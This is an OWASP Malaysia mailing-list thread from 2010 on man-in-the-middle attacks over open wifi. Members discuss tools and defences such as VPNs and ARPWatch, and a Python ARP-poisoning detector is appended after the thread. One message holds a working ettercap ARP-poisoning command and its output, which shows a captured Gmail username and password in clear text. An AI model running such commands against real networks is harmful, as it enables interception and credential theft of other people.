This paper is quite old, but it helps us understand how to detect a sniffer.
www.linux-sec.net/Sniffer.Detectors/snifferdetection.pdf

On Fri, Sep 24, 2010 at 10:48 PM, Mohd Fazli Azran <[email protected]> wrote:

> Impressive, Guru Faizul, doing a live hack... Open networks really are a
> problem, especially at a mamak stall, a kopitiam, or any shop that offers
> free wifi access. Many Malaysians are not aware that hackers are able to
> steal information without being noticed by users, most of whom are happy
> to get free wifi but have no idea what goes on behind the scenes.
>
> But please consider using a VPN if you want to get on an open network like
> this.. it may help a lot to protect your laptop from sniffers that are
> constantly reading your packets...
>
> Make sure you delete all the cookies in your browser before connecting to
> that wifi. Make sure you do!!
>
> Hardcore Windows users can try this Hotspot Shield
> <http://anchorfree.com/downloads/hotspot-shield/>. It has many benefits...
> amen!!! It is now available for iPhone too.. iPhone fans can download
> it. :)
>
> Make sure your laptop is not doing any public file sharing.. make sure of
> it!!!
>
> Lastly, do not stay connected to an open network for too long; the longer
> you are connected, the more information these hackers get. Make sure you
> do not get careless or complacent!!!
>
> Actually there is a lot more software that can be used to protect your
> laptop if you explore and research a bit on how to protect it, especially
> for Windows users.. but do not assume that users of other OSes are safe
> either... huhuhu.
>
> P/S: if you think you are a geek, try ARPWatch, Arpsnmp or DecaffeinatID;
> you will surely like them.. :P
>
> On Fri, Sep 24, 2010 at 9:20 PM, Faizul <[email protected]> wrote:
>
>> ettercap -TqM ARP:REMOTE /10.1.1.10/ /10.1.1.254/ <--- 10 is the target
>> and 254 is the gateway
>>
>> ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA <--- is this a naga or a
>> dragon
>>
>> Listening on eth0... (Ethernet)
>>
>> eth0 -> 00:0C:29:97:59:E4 10.1.1.1 255.255.255.0
>>
>> Privileges dropped to UID 0 GID 0...
>>
>> 28 plugins
>> 39 protocol dissectors
>> 53 ports monitored
>> 7587 mac vendor fingerprint
>> 1698 tcp OS fingerprint
>> 2183 known services
>>
>> Scanning for merged targets (2 hosts)...
>>
>> * |==================================================>| 100.00 %
>>
>> 2 hosts added to the hosts list...
>>
>> ARP poisoning victims:
>>
>> GROUP 1 : 10.1.1.10 00:26:22:E1:6D:92
>>
>> GROUP 2 : 10.1.1.254 00:1F:FB:08:D1:C6
>> Starting Unified sniffing...
>>
>>
>> Text only Interface activated...
>> Hit 'h' for inline help
>>
>> HTTP : 74.125.127.99:443 -> USER: 9w2pju PASS: selamathariraya INFO:
>> https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=1eic6yu9oa4y3
>>
>>
>> On Fri, Sep 24, 2010 at 8:30 PM, Amir Haris <[email protected]> wrote:
>>
>>> Haris,
>>>
>>> Yes.. it is definitely very possible. I gave a demo during the DNSSEC
>>> seminar...
>>>
>>>
>>> On Fri, Sep 24, 2010 at 8:17 PM, Hazrul Hamzah <[email protected]> wrote:
>>>
>>>> Based on the blog post, plenty of tools can be used to perform such
>>>> attacks. Nowadays tools are getting more "user friendly" and yeah, since
>>>> he's using an insecure Wifi facility - visible network packets/traffic -
>>>> perhaps webmitm, dnsspoof can be used. Or perhaps sidejacking with
>>>> ferret and hamster is much easier. But based on the symptoms or the
>>>> screenshots, it is more a monkey in the middle attack compared to
>>>> sidejacking (I prefer this one).
>>>>
>>>> So, never access your private accounts using an insecure or open AP
>>>> wireless environment. Just use broadband.. :D
>>>>
>>>> p/s: besides, I believe nobody actually reads/understands/cares about the
>>>> warning popups regarding the cert validity. Usually we just click "Add
>>>> exception" and "proceed" :D
>>>>
>>>> That's my 2 halala
>>>>
>>>> Thanks
>>>>
>>>> On 24/09/2010 19:38, Fathi Kamil Zainuddin wrote:
>>>> > There is https/ssl mitm in cain & abel using a fake private/public
>>>> > key. It intercepts the ssl handshake and provides the fake key (if the
>>>> > key is not trusted) to the client. In my previous test, my friend
>>>> > noticed a fake ssl for the maybank site when I was running the attack,
>>>> > and he told me maybank had been hacked (but not). For wireless (not
>>>> > ethernet) layer 2, there are utilities like airpwn and karma for this
>>>> > kind of attack. I haven't read the blog yet, but wanted to answer the
>>>> > question first. Wallahualam.
>>>> > Sent from my BlackBerry® smartphone
>>>> >
>>>> > -----Original Message-----
>>>> > From: Harisfazillah Jamel <[email protected]>
>>>> > Sender: [email protected]
>>>> > Date: Fri, 24 Sep 2010 19:21:31
>>>> > To: owasp-malaysia<[email protected]>
>>>> > Subject: Re: [Owasp-Malaysia] Man In The Middle Attack Wireless
>>>> >
>>>> > Title should be man in the middle attack..
>>>> >
>>>> > ettercap can be used to capture packets. But it's hard to get our
>>>> > password in HTTPS protocol. I believe a kind of proxy is used for
>>>> > this.
>>>> >
>>>> > Any idea what kind of proxy?
>>>> >
>>>> >
>>>> > On Fri, Sep 24, 2010 at 7:04 PM, Hasanuddin Abu Bakar <> wrote:
>>>> >> ARP poisoning can be used. ettercap
>>>> >>
>>>> >> On 24 Sep 2010 19:02, "Harisfazillah Jamel" <[email protected]> wrote:
>>>> >>> Assalamualaikum and warm greetings,
>>>> >>>
>>>> >>> Would like to share this blog post.
>>>> >>>
>>>> >>> http://blog.mohdhanif.com/aku-telah-berjaya-di-hack/
>>>> >>>
>>>> >>> How can a man in the middle attack be used in this case?
>>>> >>>
>>>> >>> Thanks.
>>>> > _______________________________________________
>>>> > Owasp-Malaysia mailing list
>>>> > [email protected]
>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >
>>>> > OWASP Malaysia Wiki
>>>> > http://www.owasp.org/index.php/Malaysia
>>>> >
>>>> > OWASP Malaysia Wiki Facebook
>>>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>
>> --
>> 73 de 9W2PJU
>>
>> http://9w2pju.blogspot.com
>
> Mohd Fazli Azran
> Hardcore Internet User
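The kind of check ARPWatch performs, applied to the addresses in the ettercap output quoted in the thread. This is an added example, not part of any message in the thread: the capture lines are constructed in the style of tcpdump ARP output, and `detect_arp_anomalies` is a hypothetical helper name.

```python
import re
from collections import defaultdict

# Constructed capture in the style of `tcpdump -n arp` output. The addresses
# are the ones in the ettercap output quoted in the thread; timestamps are made up.
SAMPLE = """\
20:01:00.000000 ARP, Reply 10.1.1.254 is-at 00:1f:fb:08:d1:c6, length 46
20:01:02.000000 ARP, Reply 10.1.1.10 is-at 00:26:22:e1:6d:92, length 46
20:01:05.000000 ARP, Reply 10.1.1.1 is-at 00:0c:29:97:59:e4, length 46
20:03:10.000000 ARP, Reply 10.1.1.254 is-at 00:0c:29:97:59:e4, length 46
20:03:10.100000 ARP, Reply 10.1.1.10 is-at 00:0c:29:97:59:e4, length 46
20:03:20.000000 ARP, Reply 10.1.1.254 is-at 00:0c:29:97:59:e4, length 46
"""

REPLY = re.compile(
    r"^(\S+) ARP, Reply (\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"((?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.IGNORECASE)

def detect_arp_anomalies(text):
    """Hypothetical helper: flag IP-to-MAC changes and MACs answering for several IPs."""
    baseline = {}                  # ip -> first MAC seen (assumes a clean start)
    ips_by_mac = defaultdict(set)  # mac -> every IP it has claimed
    changes, reported = [], set()
    for line in text.splitlines():
        m = REPLY.match(line)
        if not m:
            continue               # not an ARP reply line
        ts, ip, mac = m.group(1), m.group(2), m.group(3).lower()
        ips_by_mac[mac].add(ip)
        known = baseline.setdefault(ip, mac)
        # A new MAC for a known IP is what a poisoned cache looks like. It can
        # also be a replaced NIC or a DHCP reassignment, so report once per
        # (ip, mac) pair and leave the verdict to the analyst.
        if mac != known and (ip, mac) not in reported:
            reported.add((ip, mac))
            changes.append((ts, ip, known, mac))
    # One MAC claiming both the gateway and a client is the stronger signal.
    shared = {mac: sorted(ips) for mac, ips in ips_by_mac.items() if len(ips) > 1}
    return changes, shared

if __name__ == "__main__":
    changes, shared = detect_arp_anomalies(SAMPLE)
    for ts, ip, old, new in changes:
        print(f"{ts} {ip} changed from {old} to {new}")
    for mac, ips in shared.items():
        print(f"{mac} answers for {', '.join(ips)}")
```
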

